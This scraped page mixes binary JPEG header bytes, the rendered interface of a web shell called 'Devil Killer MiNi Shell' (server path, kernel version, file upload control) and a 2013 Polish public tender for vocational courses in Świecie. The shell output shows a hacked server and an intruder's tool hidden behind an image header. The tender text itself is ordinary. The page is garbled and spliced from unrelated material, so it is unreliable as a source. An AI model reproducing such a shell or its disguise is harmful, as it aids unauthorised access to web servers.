JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130429/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130429/170458-N-2013.html

<p class="kh_header"><b>Toruń: Zorganizowanie i przeprowadzenie kursów zawodowych wraz z badaniami lekarskimi oraz materiałami szkoleniowymi dla 20 uczestników projektu OHP jako realizator usług rynku pracy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 1, Działanie 1.3, Poddziałanie 1.3.3) w Świeciu</b><br>
<b>Numer ogłoszenia: 170458 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kujawsko-Pomorska Wojewódzka Komenda Ochotniczych Hufców Pracy , ul. Poznańska 11/13, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6547068, faks 056 6529619.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kujawsko-pomorska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursów zawodowych wraz z badaniami lekarskimi oraz materiałami szkoleniowymi dla 20 uczestników projektu OHP jako realizator usług rynku pracy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 1, Działanie 1.3, Poddziałanie 1.3.3) w Świeciu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych wraz z badaniami lekarskimi (w przypadku zawodów wymagających stwierdzenia przydatności do ich wykonywania), materiałami szkoleniowymi dla 20 uczestników projektu OHP jako realizator usług rynku pracy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 1, Działanie 1.3, Poddziałanie 1.3.3) w Świeciu.
W kursach zawodowych będą uczestniczyć osoby, dla których umiejętności w zakresie przewidzianym dla danego zawodu zostały zdiagnozowane przez doradcę zawodowego lub lidera klubu pracy i są niezbędne dla dalszego kształtowania ścieżki rozwoju zawodowego każdego uczestnika.
Szkolenia będą odbywały się w dwóch grupach:

GRUPA 1
Kurs tokarz-frezer dla 10 osób w Świeciu
Kurs musi obejmować teoretyczne i praktyczne zajęcia przygotowujące słuchacza  do wykonywania zawodu tokarz-frezer.
Szkolenie musi obejmować co najmniej 150 godzin lekcyjnych na jednego uczestnika w grupie szkoleniowej, w tym zajęcia teoretyczne (20 godz.) i praktyczne (130 godz.). Godzina lekcyjna szkolenia liczy 45 minut zajęć.

W programie szkolenia muszą znaleźć się zagadnienia dotyczące:
-Technicznych podstaw zawodu tokarza i frezera
-Odwzorowania i zapisu konstrukcji z elementami maszynoznawstwa
-Przepisów bezpieczeństwa i higieny pracy.
Celem szkolenia musi być zdobycie przez jego uczestników umiejętności:
-Obsługi urządzeń tokarskich i frezerskich,
-Obsługi maszyn i urządzeń o dużych gabarytach,
-Obsługi tokarek manualnych do średnicy 1250 mm, długości 10000 mm i masie do 20 ton,
-Frezowania płaszczyzn o gabarytach do 1320x500x500 mm, kół zębatych walcowych o zębach prostych i śrubowych do modułu 12 mm i średnicy do 800 mm,
-Wytaczania i wiercenia na wiertarko-frezarkach detali o gabarytach 1120x1250x1500 i masie do 2 ton.

Zajęcia teoretyczne odbędą się w siedzibie Ośrodka Szkolenia Zawodowego w Świeciu przy ul. Chmielniki 2B.
Zajęcia praktyczne muszą odbyć się na terenie Świecia. W innym przypadku, wykonawca zobowiązany jest do zorganizowania i opłacenia transportu dla uczestników kursu.
Kurs musi kończyć się egzaminem i uzyskaniem zaświadczenia o ukończeniu kursu zgodnie z § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216)

W ramach realizacji szkolenia tokarz-frezer Wykonawca będzie zobowiązany w szczególności do:
-zapewnienia uczestnikom kursu wymaganej odzieży ochronnej podczas wykonywania zajęć praktycznych, zgodnie z przepisami BHP,
-skierowania uczestników kursu na badania lekarskie co najmniej 3 dni robocze przed rozpoczęciem kursu oraz do ich sfinansowania i przekazania Zamawiającemu informacji o wynikach badań niezwłocznie po ich otrzymaniu. W przypadku wykluczenia któregokolwiek z uczestników przez uprawnionego lekarza, Wykonawca sfinansuje badania osób następnych, wg kolejności wskazanej na liście rezerwowej, aż do wyłonienia 10 uczestników kursu.

GRUPA 2 
Kurs kelner-barman dla 10 osób w Świeciu
Zakres tematyczny kursu i liczba godzin szkolenia:
-Zagadnienia z zakresu pracy na stanowisku kelner - barman: wiadomości o zakładach gastronomicznych, systemy rozliczeń kelnerskich oraz sposoby załatwiania skarg i wniosków, czynności porządkowe, poziom i kultura obsługi konsumenta w zakładzie gastronomicznym, bufet, technika noszenia naczyń i tac, zasady serwowania dań, technika podawania potraw, technologia i technika pracy w barze, podstawy miksologii - 42 godz.
-Obsługa kas fiskalnych - 8 godz. 
-Praktyki zawodowe z lokalnej restauracji, kawiarni lub klubie - 15 godz. 
Łącznie 65 godz. na jednego uczestnika w grupie szkoleniowej. 
Godzina lekcyjna szkolenia liczy 45 minut zajęć.

Celem szkolenia jest nabycie wiedzy i umiejętności niezbędnych do podjęcia zatrudnienia na stanowisku kelner-barman.
Każdy uczestnik po ukończeniu kursu musi otrzymać zaświadczenie o ukończeniu kursu zgodnie z § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
Zajęcia teoretyczne odbędą się w siedzibie Ośrodka Szkolenia Zawodowego w Świeciu przy ul. Chmielniki 2B. 
Praktyki 15-godzinne powinny odbyć się na terenie Świecia. W innym przypadku, wykonawca zobowiązany jest do zorganizowania i opłacenia transportu dla uczestników kursu.

W ramach realizacji szkolenia kelner-barman Wykonawca będzie zobowiązany      w szczególności do:
-skierowania uczestników kursu na badania lekarskie co najmniej 3 dni robocze przed rozpoczęciem kursu oraz do ich sfinansowania i zobowiązany jest do przekazania Zamawiającemu informacji o wynikach badań niezwłocznie po ich otrzymaniu. W przypadku wykluczenia któregokolwiek z uczestników przez uprawnionego lekarza, Wykonawca sfinansuje badania osób następnych, wg kolejności wskazanej na liście rezerwowej, aż do wyłonienia 10 uczestników kursu,
-skierowania uczestników oraz sfinansowania kosztów badania mikrobiologicznego na nosicielstwo bakterii z rodzaju Salmonella i Shigella. Czas przeznaczony na wykonanie badań na nosicielstwo nie jest wliczany do godzin kursu,
-zapewnienia uczestnikom szkolenia wymaganej odzieży ochronnej podczas wykonywania zajęć praktycznych, zgodnie z przepisami BHP,  
-zapewnienia kas fiskalnych, akcesoriów barmańskich oraz produktów niezbędnych do nauki miksologii  na czas trwania szkolenia. 

W ramach realizacji zamówienia Wykonawca zobowiązany jest również do:
- zapewnienia odpowiednich warunków do przeprowadzenia zajęć praktycznych (oznacza to, że miejsce szkolenia praktycznego oraz wykorzystywany podczas zajęć teoretycznych sprzęt muszą spełniać wymogi prawne w zakresie BHP i ppoż. Ponadto, sprzęt, przy pomocy którego prowadzone będą zajęcia praktyczne musi być w pełni sprawny technicznie),
- zapewnienia niezbędnych pomocy dydaktycznych do zajęć teoretycznych (np. tablica, projektor, rzutnik obrazu),
- zapewnienia materiałów szkoleniowych dla wszystkich uczestników szkolenia,
- dokumentowania przeprowadzonych zajęć oraz prowadzenia dziennika zajęć. Cała dokumentacja związana z realizacją przedmiotu zamówienia musi zawierać logo UE, EFS POKL oraz tytuł projektu,
- oznakowania logo POKL i UE wszystkich dokumentów sporządzonych w ramach projektu wg wzoru znajdującego się w wytycznych Jak promować projekty współfinansowane z Europejskiego Funduszu Społecznego w ramach POKL umieszczonego na stronie www.efs.gov.pl w zakładce zasady promocji (http://www.efs.gov.pl/ZPFE /Strony/zasady.aspx). Link do promocji POKL znajduje się również na stronie internetowej OHP (www.ohp.pl), i umieszczenia pod ww. logotypami zapisu Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu społecznego,
- wykonawca musi działać zgodnie z Ustawą o Ochronie Danych Osobowych (Dz. U. z 2002 r., Nr 101, poz. 926, z późn. zm.),
- zorganizowania i opłacenia egzaminów końcowych dla wszystkich uczestników kursu,
- wydania zaświadczeń o ukończeniu szkolenia dla każdego uczestnika kursu zgodnie z § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216),
- wykonawca zobowiązany jest do przechowywania całości dokumentacji związanej z realizacją usługi do dnia 31 grudnia 2020 roku. 
W przypadku kontroli Zamawiającego przez organ do tego uprawniony wykonawca zobowiązany jest do udostępnienia dokumentów, w tym dokumentów finansowych związanych z realizacją podpisanej umowy.
Zamawiający wymaga, aby Wykonawca uwzględnił w kalkulacji wszystkie koszty związane z realizacją zamówienia, a w szczególności koszty zapewnienia: sprzętu niezbędnego do przeprowadzenia szkolenia, badań lekarskich (w przypadku zawodów, których wykonywanie jest uzależnione od posiadania wyników aktualnych badań), materiałów szkoleniowych (podręczniki lub płyty CD), które zostaną przekazane uczestnikom na własność, koszt egzaminów po zaliczeniu których uczestnicy otrzymają wymagane uprawnienia w danym zawodzie, koszty wynagrodzeń instruktorów prowadzących zajęcia oraz opłaty za dojazd uczestników szkoleń do miejsca w którym przeprowadzone będą zajęcia praktyczne lub egzaminy (w przypadku, gdy zajęcia praktyczne lub egzamin odbywać się będą w innej miejscowości niż szkolenie).
Zajęcia w ramach kursów zawodowych realizowanych w ramach niniejszego zamówienia mogą prowadzić tylko i wyłącznie instruktorzy posiadający stosowne uprawnienia do prowadzenia kursów danego typu, o ile są one wymagane odrębnymi przepisami.
Należność za przeprowadzenie kursów zawodowych zostanie wypłacona po zakończeniu ich realizacji, na podstawie przedłożonej faktury,rachunku. 
Wymagania stawiane Wykonawcy: 
- Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
- Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
- Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
- Określenie przez Wykonawcę telefonów kontaktowych i numerów fax oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
- Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.  
Kod Wspólnego Słownika Zamówień CPV:  80530000-8 Usługi szkolenia zawodowego
Zamawiający dopuszcza możliwość składania ofert częściowych z podziałem na konkretne szkolenie:
Część 1 - zorganizowanie i przeprowadzenie kursu tokarz-frezer dla 10 osób w Świeciu
Część 2 - zorganizowanie i przeprowadzenie kursu kelner-barman dla 10 osób w Świeciu
Wykonawcy mogą składać po jednej ofercie na każdą dowolnie wybraną lub        na wszystkie części zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy miejscowo Wojewódzki Urząd Pracy lub akredytację MEN</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie realizacji, z należytą starannością, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług polegających na zorganizowaniu i/lub przeprowadzeniu lub organizowaniu i/lub przeprowadzaniu kursów zawodowych odpowiadających swoim rodzajem przedmiotowi zamówienia (w zależności na jaką część Wykonawca składa ofertę) o łącznej wartości brutto przynajmniej 20.000,00 zł w ramach których uczestniczyło co najmniej 10 osób. 
W przypadku składania przez Wykonawcę oferty na obydwie części, obowiązek wykazania przeprowadzonych kursów o łącznej wartości brutto przynajmniej 20.000,00 zł dotyczy każdej części zamówienia.
Usługi powinny być potwierdzone dokumentami poświadczającymi, że zostały wykonane należycie np. referencjami lub protokołami odbioru.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponowali osobami, które będą uczestniczyć w wykonywaniu zamówienia, a osoby te posiadają stosowne uprawnienia, o ile są wymagane odrębnymi przepisami. Wykonawca musi udokumentować dysponowanie odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia poprzez przedstawienie imiennego wykazu co najmniej dwóch osób które będą uczestniczyć w wykonywaniu zamówienia i które legitymują się kwalifikacjami zawodowymi, doświadczeniem odpowiednimi do funkcji, jakie zostaną im powierzone (tj. przeprowadziły co najmniej jedno szkolenie z tematyki adekwatnej do przedmiotu zamówienia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu wykazania reprezentacji należy dołączyć: 
a) w przypadku przedsiębiorcy, który podlega wpisowi do ewidencji działalności gospodarczej aktualny wydruk z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, 
b) osoby prawne - aktualny odpis z Krajowego Rejestru Sądowego, 
c) jednostki organizacyjne nie posiadające osobowości prawnej - w oparciu o ustawy, rozporządzenia, uchwały lub inne akty normatywne, 
d) w przypadku działania Wykonawcy przez pełnomocników - pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie w realizacji kursów zawodowych dla młodzieży zagrożonej wykluczeniem społecznym - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególności Zamawiający, dopuszcza następujące zmiany warunków i treści umowy: 
a)w  przypadku  stwierdzenia  przeciwwskazań  lekarskich  do  uczestnictwa  w  kursie  zawodowym,  wówczas  uczestnik kursu zostanie skreślony z listy uczestników i nastąpi zmniejszenie wynagrodzenia Wykonawcy o koszt przeszkolenia skreślonego uczestnika.
b)w  przypadku  rezygnacji  uczestnika z  kursu  zawodowego, powodującej skreślenie z listy uczestników projektu, nastąpi zmniejszenie wynagrodzenia Wykonawcy o koszt przeszkolenia rezygnującego uczestnika.
c)zmiany danych Wykonawcy (np.: zmiana adresu, nazwy) lub zmiana wynikająca  z przekształcenia podmiotowego po stronie Wykonawcy,
d)zmiany osoby reprezentującej po stronie Wykonawcy lub Zamawiającego
e)zmiany pracowników upoważnionych przez zamawiającego do odbioru usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kujawsko-pomorska-bip.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kujawsko-Pomorska Wojewódzka Komenda OHP w Toruniu, ul. Poznańska 11/13, 87-100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2013 godzina 10:00, miejsce: siedziba Kujawsko-Pomorskiej Wojewódzkiej Komendy OHP w Toruniu, ul. Poznańska 11/13, 87-100 Toruń, sekretariat, pok. 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursów zawodowych wraz z badaniami lekarskimi (w przypadku zawodów wymagających stwierdzenia przydatności do ich wykonywania), materiałami szkoleniowymi dla 20 uczestników projektu OHP jako realizator usług rynku pracy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki Priorytet 1, Działanie 1.3, Poddziałanie 1.3.3) w Świeciu..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu tokarz-frezer dla 10 osób w Świeciu.</p>
